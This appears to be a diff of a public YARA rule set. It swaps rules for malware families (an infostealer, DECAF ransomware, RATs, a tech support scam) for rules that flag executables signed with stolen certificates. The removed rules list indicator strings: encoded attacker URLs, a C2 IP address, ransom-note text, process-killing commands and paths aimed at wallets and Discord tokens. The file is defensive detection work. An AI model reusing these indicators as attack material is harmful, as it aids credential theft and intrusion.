+		id = "73acca59-8362-5d34-b28a-71d141d3013a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8160-L8173"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3163-L3174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "24fbc9ca6de421275813c285a8fca91cfcede48f4b4de9feda010c644f0c251f"
+		logic_hash = "9c76d5756cc79e96d194addc0e2c2c11fa4341ffa9df8f171f35df76cb9c56c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "AASEaHR0cDovL29qb3JvYmlhLmNsdWIvbGFwdG9wL2xhcHRvcC5waHA" ascii
-		$x2 = "aHR0cDovL3RlcmViaW5uYWhpY2MuY2x1Yi9zZWMva29vbC50eHQ" ascii
-		$s1 = "wewqeuuiwe[XXXXXXX]" ascii
-		$s2 = "alt|aHR0cD" ascii
-		$s3 = "<rdf:Description about='uuid:fb761dc9-9daf-11d9-9a32-fcf1da45dca2'" ascii
-		$s4 = "<rdf:Description about='uuid:0ab54f47-96d6-11d9-a59c-cbc93330e07e'" ascii
+		thumbprint = "33015f23712f36e3ec310cfd1b16649abb645a98"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bbddebeea" and pe.signatures [ i ] . serial == "9f:24:92:30:4f:c9:c9:38:44:de:a7:e5:d6:f0:ec:77" )
 }
-rule DITEKSHEN_MALWARE_Win_Dlinjector06 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Dca9012634E8B609884Fe9284D30Eff5 : FILE
 {
 	meta:
-		description = "Detects downloader / injector"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9d8164ee-49b3-5eb1-bd1d-9437fc6f1392"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "f22ef616-c7f1-5036-b303-ef8ae038ec4f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8175-L8189"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3176-L3189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e44ea8dbb94c6cd3b63d66eac3e9b3d6d5ff7d561410b8328e6c24630645305b"
+		logic_hash = "b5d663228a27d5dae46f9f03bd04833b129fc453852cb9cb9fe43e405cdcecca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" ascii wide
-		$s2 = "Content-Type: application/x-www-form-urlencoded" wide
-		$s3 = "https://ipinfo.io/" wide
-		$s4 = "https://db-ip.com/" wide
-		$s5 = "https://www.maxmind.com/en/locate-my-ip-address" wide
-		$s6 = "https://ipgeolocation.io/" wide
-		$s7 = "POST" fullword wide
+		thumbprint = "60971c18c7efb4a294f1d8ee802ff3d581c77834"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bebaeefaeba" and ( pe.signatures [ i ] . serial == "dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" or pe.signatures [ i ] . serial == "00:dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" ) )
 }
-rule DITEKSHEN_MALWARE_Win_Crown : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_781Ec65C3E38392D4C2F9E7F55F5C424 : FILE
 {
 	meta:
-		description = "Detects Crown Tech Support Scam"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ac4551d0-a574-5287-9b37-899c736db792"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "d056fb18-e641-50bb-af86-ea124203f16c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8191-L8211"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3191-L3202"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eeb36993c93d76ed118643ee417f15e1768015f72464dbabca7ae001f64a0aef"
+		logic_hash = "00b01a874e29fd2e25200f5e50c7121c3cc4bca614c31dd149d6197088292b35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920251-920261"
-
-	strings:
-		$d1 = "//prodownload.live" ascii
-		$c1 = "&uid=" ascii
-		$c2 = "&ver=" ascii
-		$c3 = "&mcid=" ascii
-		$c4 = ".php?uid=" ascii
-		$c5 = ".php?ip=" ascii
-		$s1 = "Operating System Support ID:" ascii
-		$s2 = "taskkill /IM explorer.exe -f" ascii nocase
-		$s3 = "/C taskkill /IM Taskmgr.exe -f" ascii nocase
-		$s4 = "FastSuport" fullword ascii
-		$s5 = "Support Override!" fullword wide
-		$s6 = "Support Assistance Override Activated!" fullword wide
+		thumbprint = "5d20e8f899c7e48a0269c2b504607632ba833e40"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $c* ) or 4 of ( $s* ) or ( 1 of ( $d* ) and ( 3 of ( $c* ) or 2 of ( $s* ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Facacafbfddbdbfad" and pe.signatures [ i ] . serial == "78:1e:c6:5c:3e:38:39:2d:4c:2f:9e:7f:55:f5:c4:24" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Floodfix : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Bd1E93D5787A737Eef930C70986D2A69 : FILE
 {
 	meta:
-		description = "Detects FloodFix"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b05b0b40-0de8-58a0-889e-44a12d346de4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3b5ec355-9d68-5285-bda0-ddd379ad1cf8"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8213-L8219"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3204-L3215"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7da820b00ef5ee2e943b012cfa57421a39f8a7bfc627cc1909151a47092a26d"
+		logic_hash = "0332d05f0f53ad22516fd41cb10238ad0b92ef49011e9e71a82fa2da1de5e953"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "921e5d7f9f05272b566533393d7194ea9227e582"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "FloodFix" ) or pe.exports ( "FloodFix2" ) ) and pe.exports ( "crc32" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdefedddbdedbcbfffbeadb" and pe.signatures [ i ] . serial == "bd:1e:93:d5:78:7a:73:7e:ef:93:0c:70:98:6d:2a:69" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK_Infostealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_B0009Bb062F52Eb6001Ba79606De243D : FILE
 {
 	meta:
-		description = "Detects unknown information stealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f6f9816f-79bd-527c-9c0f-24e09c95ae35"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "41293f0b-604a-5993-8b05-9ca639828eec"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8221-L8246"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3217-L3228"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ca57ebf4b56020d278ec8a7e721c72de7a1f925a8e7f1f3a9edc8a70b88ff9d1"
+		logic_hash = "111a08d62f483daf23220e7044cc291b6ea6922746d48934f72a892b7dfd762b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920263"
-		hash1 = "b7a2cb34d3bc42d6d4c9d9af7dd406e2a5caef8ea46e5d09773feeb9920a6b21"
-		hash2 = "dd95377842932d77e225b126749e1e6e8ecd6f5c6540d084a551a80a54d02d7d"
-		hash3 = "12f790d9a0775b5e62effc6ea9e55bbef345fffbfb2f671f85098c4f7661dd0f"
-		hash4 = "0a4cea763dffde451c75a434143fc5d014c32c6d1f8f34920ea5f2854e62118f"
-
-	strings:
-		$s1 = "%s\\%s\\%s-Qt" fullword wide
-		$s2 = "%s\\%s.json" fullword wide
-		$s3 = "*.mmd*" fullword wide
-		$s4 = "%s\\%s.vdf" fullword wide
-		$s5 = "%-50s %s" fullword wide
-		$s6 = "dISCORD|lOCAL" fullword ascii nocase
-		$s7 = "sTORAGE|LEVELDB" fullword ascii nocase
-		$s8 = ".coin" fullword ascii
-		$s9 = ".emc" fullword ascii
-		$s10 = ".lib" fullword ascii
-		$s11 = ".bazar" fullword ascii
-		$s12 = "id=%d" fullword ascii
-		$s13 = "2:?/v /v /v /^Y" fullword ascii
+		thumbprint = "c89f06937d24b7f13be5edba5e0e2f4e05bc9b13"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 8 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbfdddcfabc" and pe.signatures [ i ] . serial == "b0:00:9b:b0:62:f5:2e:b6:00:1b:a7:96:06:de:24:3d" )
 }
-rule DITEKSHEN_MALWARE_Win_DECAF : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_294E7A2Ccfc28Ed02843Ecff25F2Ac98 : FILE
 {
 	meta:
-		description = "Detects DECAF ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c6e4ce00-0be9-572d-987c-c47d699002f0"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "ae3c0758-7863-54eb-a94f-3c86d5d34d21"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8248-L8268"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3230-L3241"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5d79a4f310fb00022eb9d636f161227e84a7e15517c4d2c39acafa7d81af5c2a"
+		logic_hash = "75c3093978875c7e523525a3b64bf985139359d9696fdb9dbd7db3e915043194"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "main.EncWorker" fullword ascii
-		$s2 = "Paths2Encrypt" fullword ascii
-		$s3 = "/cmd/encryptor/main.go" ascii
-		$s4 = "*win.FileUtils; .autotmp_41 *lib.Encryptor; .autotmp_" ascii
-		$s5 = "\"Microsoft Window" fullword wide
-		$s6 = "Legal_Policy_Statement" fullword wide
-		$s7 = ").Encrypt." ascii
-		$s8 = "*struct { F uintptr; pw *os.File; c *" ascii
-		$s9 = ".ListFilesToEnc." ascii
-		$m1 = "WINNER WINNER CHICKEN DINNER" ascii
-		$m2 = "All your servers and computers are encrypted" ascii
-		$m3 = "We guarantee to decrypt one image file for free." ascii
-		$m4 = "We WILL NOT be able to RESTORE them." ascii
+		thumbprint = "a57a2de9b04a80e9290df865c0abd3b467318144"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or 3 of ( $m* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbaadbdcecafdfafbe" and pe.signatures [ i ] . serial == "29:4e:7a:2c:cf:c2:8e:d0:28:43:ec:ff:25:f2:ac:98" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Windealer : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A61B5590C2D8Dc70A31F8Ea78Cda4353 : FILE
 {
 	meta:
-		description = "Detects WinDealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d4f3b0cc-121e-5032-9721-1e2a86842fa5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0a22b3a5-cc61-5aec-9fc7-bbd03cd4ab03"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8270-L8301"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3243-L3254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eabc41ea69f142ee7c243cbc75ceda909a722be382ad91a01c805aef637be915"
+		logic_hash = "7d57f5cb2691d8dfb5f5ef63f7bfb4290f0bd8d990c61fe0655e35c1b3f554f0"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920264"
-
-	strings:
-		$d1 = "downfile" fullword ascii
-		$d2 = "getmypath" fullword ascii
-		$d3 = "content-type: monitor" fullword ascii
-		$d4 = "content-type: UsedType" fullword ascii
-		$d5 = "write command error" fullword ascii
-		$d6 = "C:\\WINDOWS\\system32\\kernel32.dll" fullword ascii
-		$l1 = "currentconfig" fullword ascii
-		$l2 = "remotedomain" fullword ascii
-		$l3 = "reserveip" fullword ascii
-		$l4 = "otherinfo" fullword ascii
-		$l5 = "filelen" fullword ascii
-		$l6 = "%s%s.bak" fullword wide
-		$l7 = "localmachine" fullword ascii
-		$l8 = "remoteip" fullword ascii
-		$l9 = "datastate" fullword ascii
-		$l10 = "SYSTEM\\CurrentControlSet\\Control\\Network\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\%s\\Connection" fullword ascii
-		$s1 = "%s\\%s\\V5_History.dat" fullword wide
-		$s2 = "%s\\%s\\history2.dat" fullword wide
-		$s3 = "%s\\%s\\history.imw" fullword wide
-		$s4 = "%s\\%s\\main.imw" fullword wide
-		$s5 = "%s%d.%d.%d.%dWindows/%u" fullword ascii
-		$s6 = "%s\\%c_%s_tmp" fullword wide
-		$s7 = "%s\\%s\\main.db" fullword wide
+		thumbprint = "d1f77736e8594e026f67950ca2bf422bb12abc3a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $d* ) and 1 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $d* ) ) or 6 of ( $l* ) or ( pe.exports ( "DealC" ) and pe.exports ( "DealR" ) and pe.exports ( "DealS" ) and 1 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdddcfaebffbfdcabaffe" and pe.signatures [ i ] . serial == "a6:1b:55:90:c2:d8:dc:70:a3:1f:8e:a7:8c:da:43:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Exmatter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_21C9A6Daff942F2Db6A0614D : FILE
 {
 	meta:
-		description = "Detects BlackMatter data exfiltration tool"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "93df7a68-1e19-5db3-95d4-39d77d1036d8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e09476f7-d48d-58e5-aeca-fffacf569243"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8303-L8325"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3256-L3267"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "25a35c82919f96bdba00558616f574e901b83785713ed1a63a6f06df576777cd"
+		logic_hash = "c466a829d8141ba40187309559f62af73ea47e325eb95ef4c634bac60167788b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "4a0e10e1e9fea0906379f99fa350b91c2af37f0fd2cc55491643cc71a9887d30"
-		hash2 = "a5e050f1278473d41c3a3d6f98f3fd82932f51a937bc57d8f5605815f0efb0f8"
-
-	strings:
-		$s1 = "Renci.SshNet." ascii
-		$s2 = "DirNotEmpty" fullword ascii
-		$s3 = "MkDir" fullword ascii
-		$s4 = "RmDir" fullword ascii
-		$s5 = "get_MainWindowHandle" fullword ascii
-		$s6 = "GetCurrentProcess" fullword ascii
-		$s7 = "]]>]]>" fullword wide
-		$s8 = "1.3.132.0.35" fullword wide
-		$s9 = "1.3.132.0.34" fullword wide
-		$s10 = "1.2.840.10045.3.1.7" fullword wide
-		$x1 = "sender2.pdb" fullword ascii
-		$x2 = { 64 00 61 00 74 00 61 00 ?? 72 00 6f 00 6f 00 74 }
-		$x3 = "157.230.28.192" fullword wide
+		thumbprint = "7dd9acb2ef0402883c65901ebbafd06e5293d391"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 1 of ( $x* ) and 7 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ledger SAS" and pe.signatures [ i ] . serial == "21:c9:a6:da:ff:94:2f:2d:b6:a0:61:4d" )
 }
-rule DITEKSHEN_MALWARE_Win_Brbbot : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1F55Ae3Fca38827Cde6Cc7Ca1C0D2731 : FILE
 {
 	meta:
-		description = "Detects BrbBot"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d77dfdcf-4cd5-578e-99eb-c987e7b5b706"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8a32fa5d-671e-5012-9de1-6afc21751b94"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8327-L8345"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3269-L3280"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64df5bba698fbba1baf27eedb9a2eb46c5e0752996ea91900f8377200d54eeeb"
+		logic_hash = "1aa7c6c5430f196d1031acabfe141c30044c23c4119619752c50f4665966606e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		snort_sid = "920265"
-
-	strings:
-		$x1 = "brbconfig.tmp" fullword ascii
-		$x2 = "brbbot" fullword ascii
-		$s1 = "%s?i=%s&c=%s&p=%s" fullword ascii
-		$s2 = "exec" fullword ascii
-		$s3 = "CONFIG" fullword ascii wide
-		$s4 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" fullword ascii
-		$s5 = { 43 4f 4e 46 49 47 00 00 65 6e 63 6f 64 65 00 00
-                73 6c 65 65 70 00 00 00 65 78 69 74 00 00 00 00
-                63 6f 6e 66 00 00 00 00 66 69 6c 65 00 00 00 00
-                65 78 65 63 }
+		thumbprint = "a279fa4186ef598c5498ba5c0037c7bd4bd57272"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcceaeafbbdccccddfbbb" and pe.signatures [ i ] . serial == "1f:55:ae:3f:ca:38:82:7c:de:6c:c7:ca:1c:0d:27:31" )
 }
-rule DITEKSHEN_MALWARE_Win_Babylonrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008D1Bae9F7Aef1A2Bcc0D392F3Edf3A36 : FILE
 {
 	meta:
-		description = "Detects BabylonRAT / CollectorStealer / ParadoxRAT"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7352e0cf-64ab-5ba4-afaf-04067a0046e8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8d1e7615-f462-56eb-9198-30b868572cf1"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8347-L8373"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3282-L3293"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "352efb98e298e9f0ce17c20d44d193f2565ec559923210d80dec1a0988545a30"
+		logic_hash = "6b15f97a51f25b1292cc3fd80889ea1edb01814d1951ef1d3b4cac5e83c7fbca"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "Babylon RAT Client" wide nocase
-		$x2 = "ParadoxRAT_Client" fullword ascii
-		$s1 = "@ConfigsEx" fullword wide
-		$s2 = "ClipBoard.txt" fullword wide
-		$s3 = "[%02d/%02d/%d %02d:%02d:%02d] [%s] (%s):" fullword wide
-		$s4 = "\\%Y %m %d - %I %M %p" fullword wide
-		$s5 = "[%02d/%02d/%d %02d:%02d:%02d] (%s)" fullword wide
-		$s6 = " c:\\Windows\\system32\\cmd.exe" fullword wide
-		$s7 = "Update Failed [OpenProcess]" wide
-		$s8 = "DoS Already Active..." fullword wide
-		$s9 = "File Downloaded and Execut" wide
-		$s10 = "LgDError33x98dGetProcAddress" fullword wide
-		$s11 = "@SPYNET" fullword wide
-		$s12 = "Recovery.Recovery" fullword wide
-		$s13 = "GetChrome" fullword wide
-		$s14 = "\\drivers\\etc\\HOSTS" fullword ascii
-		$s15 = "plugin-container.exe" fullword ascii
-		$s16 = "bss_server.usrRelay" fullword ascii
-		$s17 = "sckRelay" fullword ascii
+		thumbprint = "5927654acf9c66912ff7b41dab516233d98c9d72"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 8 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaffbebfeebbefbeeb" and pe.signatures [ i ] . serial == "00:8d:1b:ae:9f:7a:ef:1a:2b:cc:0d:39:2f:3e:df:3a:36" )
 }
-rule DITEKSHEN_MALWARE_Win_Netsupport : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_239Ba103C2943D2Dff5E3211D6800D09 : FILE
 {
 	meta:
-		description = "Detects NetSupport client"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "958e82c5-aeac-58f4-b214-a9382b598cd9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1444a44e-2f45-547f-a5fc-0941edd506bc"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8375-L8386"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3295-L3306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4e8120d902fdee2a3f87c85bb6bb7d3bba79e3828500f297c2dc57d5213cf6a8"
+		logic_hash = "b155ba969334945013af40fbf43b8318a221f6212c4a29e0ee98bc02bb9acafb"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920266-920267"
-
-	strings:
-		$s1 = ":\\nsmsrc\\nsm\\" fullword ascii
-		$s2 = "name=\"NetSupport Client Configurator\"" fullword ascii
-		$s3 = "<description>NetSupport Manager Remote Control.</description>" fullword ascii
+		thumbprint = "d8ea0533af5c180ce1f4d6bc377b736208b3efbb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bcafaecbecacbca" and pe.signatures [ i ] . serial == "23:9b:a1:03:c2:94:3d:2d:ff:5e:32:11:d6:80:0d:09" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Gobrutloader : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_205B80A74A5Dddedea6B84A1E1C44010 : FILE
 {
 	meta:
-		description = "Detects GoBrut StealthWorker laoder"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "748f8055-71d9-5757-8eb0-90dc3ee35c74"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "43e34fe4-e580-572e-a14e-5ee58b3bf594"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8388-L8394"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3308-L3319"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6241117cffb147763ace41b36cd1524f48bfc7cb06d56a82d7b30bec9e1baf5b"
+		logic_hash = "1af8527193acdbcb3ba0239879c3b23c6ba4e68d920ae4d5ce503d44e32991f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "1a743595dfaa29cd215ec82a6cd29bb434b709cf"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.exports ( "@SetFirstEverVice@8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Befadbffde" and pe.signatures [ i ] . serial == "20:5b:80:a7:4a:5d:dd:ed:ea:6b:84:a1:e1:c4:40:10" )
 }
-rule DITEKSHEN_MALWARE_Win_Milan : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_6C8D0Cf4D1593Ee8Dc8D34Be71E90251 : FILE
 {
 	meta:
-		description = "Detects Milan Lyceum backdoor"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2ea0775b-65d4-58b9-9af9-c07f29742627"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "fe5cbea2-1704-550c-bd2e-82defba20f24"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8396-L8467"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3321-L3332"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "102af43be7cc3d873fbce78c95c767ebb6aadb2e7084b48f3cf48c11071d7a71"
